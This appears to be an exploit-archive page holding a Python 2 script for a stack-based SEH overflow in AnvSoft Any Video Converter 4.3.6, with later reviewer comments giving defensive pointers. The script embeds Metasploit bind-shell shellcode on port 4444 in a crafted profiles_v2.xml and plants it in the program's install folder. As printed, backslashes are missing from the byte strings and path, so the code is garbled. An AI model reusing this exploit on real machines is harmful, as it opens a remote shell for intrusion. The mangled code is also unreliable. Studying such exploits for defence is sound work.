
AnvSoft Any Video Converter 4.3.6 Stack Overflow

Posted on 04 May 2012

#!/usr/bin/python
#
# Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow
# Author: cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research
# Website: http://www.spentera.com
# Platform: Windows
# Tested on: Windows XP SP3
# Based on POC by Vulnerability-Lab (http://www.exploit-db.com/exploits/18717/)
#
# NOTE(review): this listing was flattened when the page was extracted. Line
# breaks are restored below; every string literal is reproduced exactly as the
# page shows it. Backslashes (in the "x.." byte strings, around the quoted XML
# attribute values and in the Windows path) appear to have been lost, so the
# literals are not the author's original byte values.
#
# What the code below does: it builds a profiles_v2.xml document whose
# <category name="..."> attribute is a long attacker-chosen string, writes it
# to the current directory and copies it into the application's install
# directory. Per the title, loading that file overflows a stack buffer in
# Any Video Converter 4.3.6.
#
# Points a defender can take from it:
#  - The trigger is a local profile file, so the script needs write access to
#    the install directory (see the IOError branch); tight ACLs on that
#    directory and running without administrative rights limit who can plant it.
#  - A <category> "name" attribute of well over a thousand characters in
#    profiles_v2.xml is abnormal and can be checked for.
#  - The author's payload comment and final status message both name TCP port
#    4444; a listener on that port owned by the converter process is an
#    indicator for this specific sample.
#  - The nseh/seh variable names indicate an exception-handler overwrite; the
#    only tested platform listed is Windows XP SP3. SafeSEH/SEHOP and DEP are
#    the platform mitigations aimed at that class of overwrite.
import os,shutil,time,sys

def banner():
    """Print the script's title and credit lines to stdout."""
    print " AnvSoft Any Video Converter 4.3.6 Stack Overflow"
    print " based on POC by Vulnerability-Lab (www.vulnerability-lab.com)"
    print " cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research "
    print " ---------------------------------------------------- "

# Filler that precedes the two handler-record fields below; presumably sized to
# reach the exception-handler record on the stack -- TODO confirm against the
# original advisory.
junk = "x90" * 328
# Values meant to land on the "next SEH" and "SEH handler" fields, going by the
# variable names; the page does not say which module the second value refers to.
nseh = "xebx06x90x90"
seh = "xe4xf3x04x10"
# Author's label for the payload that follows.
# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
# badchars = "x00x0ax0dx22x26x3e"
code = ("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax48"
"x58x30x41x30x50x42x6bx42x41x58x41x42x32x42x41x32"
"x41x41x30x41x41x58x50x38x42x42x75x59x79x69x6cx30"
"x6ax78x6bx32x6dx78x68x4bx49x4bx4fx4bx4fx4bx4fx41"
"x70x6cx4bx30x6cx51x34x66x44x6ex6bx72x65x35x6cx6c"
"x4bx73x4cx67x75x30x78x67x71x68x6fx4cx4bx50x4fx47"
"x68x4ex6bx41x4fx67x50x55x51x7ax4bx42x69x6cx4bx74"
"x74x4cx4bx36x61x78x6ex74x71x4bx70x4fx69x6ex4cx4f"
"x74x4bx70x70x74x65x57x4ax61x6bx7ax56x6dx47x71x4b"
"x72x5ax4bx58x74x35x6bx72x74x75x74x34x68x30x75x4b"
"x55x4cx4bx43x6fx57x54x36x61x68x6bx72x46x4ex6bx56"
"x6cx30x4bx6ex6bx43x6fx65x4cx67x71x4ax4bx44x43x54"
"x6cx4cx4bx6fx79x70x6cx74x64x35x4cx70x61x39x53x57"
"x41x69x4bx50x64x6cx4bx47x33x70x30x6cx4bx57x30x76"
"x6cx6cx4bx72x50x45x4cx6ex4dx4cx4bx53x70x43x38x63"
"x6ex55x38x6cx4ex30x4ex54x4ex78x6cx42x70x69x6fx6e"
"x36x53x56x63x63x70x66x33x58x54x73x36x52x53x58x61"
"x67x34x33x57x42x41x4fx53x64x39x6fx5ax70x45x38x68"
"x4bx7ax4dx39x6cx57x4bx66x30x6bx4fx49x46x63x6fx4b"
"x39x79x75x65x36x4fx71x58x6dx47x78x63x32x70x55x73"
"x5ax37x72x4bx4fx68x50x70x68x4ex39x74x49x4cx35x4c"
"x6dx71x47x4bx4fx4ax76x32x73x63x63x50x53x50x53x31"
"x43x52x63x73x63x47x33x33x63x59x6fx4ex30x31x76x30"
"x68x77x61x51x4cx31x76x51x43x4dx59x6ax41x6fx65x45"
"x38x4fx54x66x7ax50x70x6ax67x66x37x79x6fx6ex36x61"
"x7ax64x50x33x61x42x75x69x6fx6ax70x33x58x4cx64x6e"
"x4dx56x4ex39x79x73x67x4bx4fx7ax76x72x73x70x55x59"
"x6fx58x50x61x78x6ax45x41x59x6dx56x42x69x66x37x4b"
"x4fx4ex36x46x30x76x34x31x44x50x55x69x6fx4ex30x6e"
"x73x75x38x6bx57x64x39x49x56x43x49x46x37x39x6fx4b"
"x66x66x35x39x6fx68x50x75x36x62x4ax43x54x72x46x65"
"x38x65x33x70x6dx4fx79x6bx55x32x4ax46x30x46x39x41"
"x39x38x4cx4dx59x4dx37x41x7ax52x64x4fx79x6bx52x70"
"x31x4bx70x4cx33x4fx5ax49x6ex77x32x76x4dx69x6ex31"
"x52x64x6cx4ex73x4ex6dx43x4ax34x78x6ex4bx6ex4bx6c"
"x6bx50x68x62x52x4bx4ex78x33x54x56x4bx4fx73x45x32"
"x64x39x6fx38x56x61x4bx32x77x43x62x70x51x73x61x71"
"x41x63x5ax44x41x31x41x43x61x63x65x56x31x6bx4fx4e"
"x30x53x58x4cx6dx5ax79x54x45x58x4ex33x63x4bx4fx6b"
"x66x50x6ax39x6fx4bx4fx70x37x4bx4fx38x50x4ex6bx62"
"x77x49x6cx4cx43x49x54x43x54x69x6fx5ax76x56x32x79"
"x6fx6ex30x50x68x53x4ex6ax78x7ax42x44x33x52x73x39"
"x6fx4ex36x79x6fx68x50x48")
# Pads the payload region so that payload plus padding totals 1000 characters.
sisa = "x90" * (1000-len(code))

# Assemble the XML document that the application reads as its profile list.
poc = "<root> "
poc+= "<categories> "
# NOTE(review): the oversized value goes into the "name" attribute. As printed
# on the page the quotes around the attribute values are unescaped, so this
# statement is not valid Python in its current form.
poc+= "<category name=""+junk+nseh+seh+code+sisa+"" id="0" icon="cat_all.bmp" desc="All Profiles"/> "
poc+= "</categories> "
poc+= "<groups></groups> <profiles></profiles> </root> "

# NOTE(review): `file` shadows the Python 2 builtin of the same name.
file = "profiles_v2.xml"
splash=os.path.abspath(file)
# Install directory the crafted file is copied into (path separators are
# missing in the page text).
profdir="C:Program FilesAnvSoftAny Video Converter Professional"
# NOTE(review): the output file is opened before the platform and directory
# checks, so profiles_v2.xml is created or truncated in the current directory
# even on the branches that exit early, and the handle is only closed on the
# success path.
writeFile = open(file, "w")

if os.name == 'nt':
    if os.path.isdir(profdir):
        try:
            # Write the document locally, then copy it over the application's
            # own profile file location.
            writeFile.write(poc)
            banner()
            print "[*] Creating the malicious",file
            time.sleep(1)
            print "[*] Malicious",file,"created.."
            writeFile.close()
            shutil.copy2(splash,profdir)
            print "[*] File",file,"has been copied to",profdir
            print "[*] Now open AnvSoft program and telnet to port 4444"
        except IOError:
            # Raised when the write or the copy into the install directory fails.
            print "[-] Could not write to destination folder, check permission.."
            sys.exit()
    else:
        print "[-] Could not find installation directory, is AnvSoft Any Video Converter installed?"
        sys.exit()
else:
    print "[-] Please run this script on Windows."
    sys.exit()

 
